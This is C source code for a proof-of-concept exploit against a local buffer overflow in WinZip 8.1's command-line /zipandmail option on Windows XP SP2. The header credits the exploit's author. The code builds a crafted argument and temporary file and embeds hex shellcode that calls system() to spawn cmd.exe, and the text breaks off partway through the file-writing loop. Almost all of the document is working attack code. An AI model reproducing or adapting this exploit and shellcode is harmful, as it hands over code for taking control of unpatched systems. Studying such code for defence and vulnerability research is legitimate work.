/* * * WinZip Command Line Local Buffer Overflow * http://securitytracker.com/alerts/2004/Sep/1011132.html * http://www.winzip.com/wz90sr1.htm * Exploit coded By ATmaCA * Web: atmacasoft.com && spyinstructors.com * E-Mail: atmaca@icqmail.com * Credit to kozan * */ /* * * Tested with WinZip 8.1 on Win XP Sp2 En * Bug Fixed on WinZip 9.0 Service Release 1 (SR-1) * http://www.winzip.com/wz90sr1.htm * */ #include #include #define NOP 0x90 void main() { // create crafted command line char tmpfile[] = "c:\\wzs45.tmp"; char winzippath[] = "C:\\Program Files\\WINZIP\\winzip32.exe"; char zipandmailpar[] = " -* /zipandmail /@ "; char runpar[300]; int i = 0; strcpy(runpar,winzippath); strcat(runpar,zipandmailpar); strcat(runpar,tmpfile); // need for some input file name .tmp but not must to exist char inputfile[] = "C:\\someinputfile.ext\n"; // launch a local cmd.exe char shellcode[] = "\x55\x8B\xEC\x33\xFF" "\x57\x83\xEC\x04\xC6\x45\xF8" "\x63\xC6\x45\xF9\x6D\xC6\x45" "\xFA\x64\xC6\x45\xFB\x2E\xC6" "\x45\xFC\x65\xC6\x45\xFD\x78" "\xC6\x45\xFE\x65\xB8" "\xC7\x93\xC2\x77" //77C293C7 system() - WinXP SP2 - msvcrt.dll "\x50\x8D\x45\xF8\x50" "\xFF\x55\xF4"; // create crafted .tmp file FILE *di; if( (di=fopen(tmpfile,"wb")) == NULL ){ return; } for(i=0;i